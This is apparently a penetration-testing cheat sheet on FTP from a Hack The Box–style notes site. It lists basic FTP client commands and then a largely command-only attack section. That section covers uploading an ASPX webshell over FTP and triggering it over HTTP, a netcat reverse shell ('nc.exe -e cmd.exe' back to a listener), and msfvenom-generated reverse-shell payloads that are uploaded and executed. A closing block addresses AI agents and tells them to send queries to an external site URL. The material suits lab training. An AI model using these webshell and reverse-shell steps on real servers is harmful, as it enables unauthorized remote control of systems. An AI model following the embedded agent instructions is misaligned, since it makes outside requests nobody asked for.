# FTP

## Basics

* [FtpCommands](https://kb.globalscape.com/Knowledgebase/10407/Can-I-use-a-Windows-Command-Prompt-to-send-FTP-Commands-to-a-server)

```
ftp 10.x.x.x    ..connect
help            ..help
pwd             ..print working directory
dir             ..list directory (also: ls)
cd c:\data      ..change directory
lcd /tmp        ..local change directory
get flag.txt    ..download
put test.txt    ..upload
binary          ..Used for graphics, compressed files, audio
put Potato.exe  ..Can now upload EXE
```

## FtpHttp Vulnerability

* If your FTP is also a HTTP directory
* You can upload and execute from http
* REF: develHTB, [ReverseShells](/03-getting-in/03-reverseshell-php.md)

```
-----------------
-----------------
Webshell
locate *aspx
cp /usr/share/webshells/aspx/cmdasp.aspx .
FTP 10.x.x.x
put cmdasp.aspx
firefox http://10.x.x.x/cmdasp.aspx

-----------------
-----------------
Reverse
locate nc.exe
cp nc.exe .
FTP 10.x.x.x
put nc.exe
sudo smbserver.py share .     ..or use smbshare
nc -nvlp 4444                 ..nc listener
http://10.x.x.x/cmdasp.aspx   ..execute our nc reverse shell
cmd = \\10.x.x.x\share\nc.exe -e cmd.exe 10.x.x.x 4444

-----------------
-----------------
Payloads
msfvenom --list payloads | grep windows
msfvenom -p windows/shell_reverse_tcp lhost=$IP lport=4444 -f aspx -o shell.aspx
msfvenom -p windows/shell_reverse_tcp lhost=$IP lport=4444 -f exe -o shell.exe
ftp $IP
put shell.aspx
put shell.exe
nc -nvlp 4444
firefox http://$IP/shell.aspx
dir C:\inetpub\wwwroot
C:\inetpub\wwwroot\shell.exe
```

## REF

* [TransferFiles](/06-linux-privesc/04-transfer-files.md#ftp)


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://pentest.mxhx.org/03-getting-in/ftp.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.